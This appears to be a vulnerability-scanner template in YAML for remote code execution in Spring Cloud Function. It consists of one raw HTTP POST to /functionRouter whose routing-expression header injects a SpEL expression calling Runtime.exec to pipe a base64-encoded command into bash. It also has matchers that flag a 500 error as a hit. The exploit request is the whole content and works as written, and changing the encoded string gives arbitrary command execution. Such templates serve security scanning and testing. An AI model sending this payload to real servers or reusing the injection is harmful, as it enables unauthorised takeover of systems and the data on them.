id: spring-functions-rce

info:
  name: spring functions rce
  author: Str1am
  severity: critical
  tags: spring,rce

requests:
  - raw:
      - |
        POST /functionRouter HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
        Accept-Encoding:gzip,deflate
        spring.cloud.function.routing-expression: T(java.lang.Runtime).getRuntime().exec("bash -c {echo,d2hvbWFp}|{base64,-d}|{bash,-i}")
        Content-Length: 3
        Accept-Language: zh-CN,zh;q=0.9
        Connection: close

        any

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 500
      - type: word
        words:
          - "Internal Server Error"
        part: body
        condition: and